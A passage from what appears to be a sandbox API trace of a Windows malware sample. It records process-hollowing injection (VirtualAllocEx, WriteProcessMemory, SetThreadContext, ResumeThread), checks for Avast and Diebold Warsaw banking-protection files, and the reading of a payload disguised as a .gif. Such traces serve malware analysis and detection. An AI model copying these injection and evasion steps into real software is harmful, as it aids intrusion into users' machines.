[148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0199.939] ReadProcessMemory (in: hProcess=0x13c, lpBaseAddress=0x7ffdf008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0199.939] VirtualAllocEx (hProcess=0x13c, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0199.939] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1d10000
[0199.939] VirtualAlloc (lpAddress=0x1d10000, dwSize=0x44000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d10000
[0199.941] VirtualAlloc (lpAddress=0x1cf0000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x1cf0000
[0199.945] WriteProcessMemory (in: hProcess=0x13c, lpBaseAddress=0x400000, lpBuffer=0x1cef91c*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1cef91c*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0199.955] WriteProcessMemory (in: hProcess=0x13c, lpBaseAddress=0x7ffdf008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0199.955] SetThreadContext (hThread=0x140, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x10fcd0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0199.955] ResumeThread (hThread=0x140) returned 0x1
[0199.955] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0199.955] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0199.955] GlobalUnlock (hMem=0x189000c) returned 0
[0199.955] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0199.955] GlobalUnlock (hMem=0x1890004) returned 0
[0199.962] Sleep (dwMilliseconds=0xe74e)
[0209.986] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0209.986] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0209.987] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0209.987] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0209.987] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x148
[0209.987] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0209.987] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0209.987] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0209.987] SetFilePointer (in: hFile=0x148, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0209.989] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0209.989] ReadFile (in: hFile=0x148, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0209.991] CloseHandle (hObject=0x148) returned 1
[0209.991] GlobalLock (hMem=0x189000c) returned 0x25b100
[0209.992] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0209.992] GlobalUnlock (hMem=0x189000c) returned 0
[0209.992] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0209.992] GlobalLock (hMem=0x189000c) returned 0x25b100
[0209.993] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0209.993] GlobalUnlock (hMem=0x189000c) returned 0
[0209.993] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0209.993] GlobalLock (hMem=0x189000c) returned 0x25f110
[0209.994] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0209.994] GlobalUnlock (hMem=0x189000c) returned 0
[0209.994] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0209.995] GlobalLock (hMem=0x189000c) returned 0x265120
[0209.995] GlobalHandle (pMem=0x265120) returned 0x189000c
[0209.995] GlobalUnlock (hMem=0x189000c) returned 0
[0209.995] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0209.995] GlobalLock (hMem=0x189000c) returned 0x265120
[0209.996] GlobalHandle (pMem=0x265120) returned 0x189000c
[0209.996] GlobalUnlock (hMem=0x189000c) returned 0
[0209.996] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0209.997] GlobalLock (hMem=0x189000c) returned 0x26f130
[0209.997] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0209.997] GlobalUnlock (hMem=0x189000c) returned 0
[0209.997] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0209.997] GlobalLock (hMem=0x189000c) returned 0x25b100
[0209.998] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0209.998] GlobalUnlock (hMem=0x189000c) returned 0
[0209.998] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0209.998] GlobalLock (hMem=0x189000c) returned 0x25b100
[0209.999] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0209.999] GlobalUnlock (hMem=0x189000c) returned 0
[0209.999] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0209.999] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.000] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.000] GlobalUnlock (hMem=0x189000c) returned 0
[0210.000] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0210.000] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.000] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.001] GlobalUnlock (hMem=0x189000c) returned 0
[0210.001] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0210.001] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.001] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.001] GlobalUnlock (hMem=0x189000c) returned 0
[0210.001] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0210.001] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.002] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.002] GlobalUnlock (hMem=0x189000c) returned 0
[0210.002] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0210.002] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.003] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.003] GlobalUnlock (hMem=0x189000c) returned 0
[0210.003] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0210.003] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.003] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.003] GlobalUnlock (hMem=0x189000c) returned 0
[0210.004] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0210.004] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.004] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.004] GlobalUnlock (hMem=0x189000c) returned 0
[0210.004] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0210.004] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.005] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.005] GlobalUnlock (hMem=0x189000c) returned 0
[0210.005] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0210.006] GlobalLock (hMem=0x189000c) returned 0x27b110
[0210.007] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0210.007] GlobalUnlock (hMem=0x189000c) returned 0
[0210.007] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0210.007] GlobalLock (hMem=0x189000c) returned 0x27b110
[0210.008] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0210.008] GlobalUnlock (hMem=0x189000c) returned 0
[0210.008] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0210.010] GlobalLock (hMem=0x189000c) returned 0x29f120
[0210.010] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0210.010] GlobalUnlock (hMem=0x189000c) returned 0
[0210.010] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0210.011] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.011] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.011] GlobalUnlock (hMem=0x189000c) returned 0
[0210.011] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0210.011] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.012] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.012] GlobalUnlock (hMem=0x189000c) returned 0
[0210.012] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0210.012] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.013] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.013] GlobalUnlock (hMem=0x189000c) returned 0
[0210.013] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0210.013] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.013] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.013] GlobalUnlock (hMem=0x189000c) returned 0
[0210.013] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0210.013] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.014] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.014] GlobalUnlock (hMem=0x189000c) returned 0
[0210.014] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0210.014] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.015] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.015] GlobalUnlock (hMem=0x189000c) returned 0
[0210.015] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0210.015] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.016] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.016] GlobalUnlock (hMem=0x189000c) returned 0
[0210.016] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0210.016] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.017] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.017] GlobalUnlock (hMem=0x189000c) returned 0
[0210.017] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0210.017] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.018] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.018] GlobalUnlock (hMem=0x189000c) returned 0
[0210.018] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0210.018] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.018] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.018] GlobalUnlock (hMem=0x189000c) returned 0
[0210.018] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0210.018] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.019] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.019] GlobalUnlock (hMem=0x189000c) returned 0
[0210.019] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0210.019] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.020] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.020] GlobalUnlock (hMem=0x189000c) returned 0
[0210.020] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0210.020] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.020] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.021] GlobalUnlock (hMem=0x189000c) returned 0
[0210.021] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
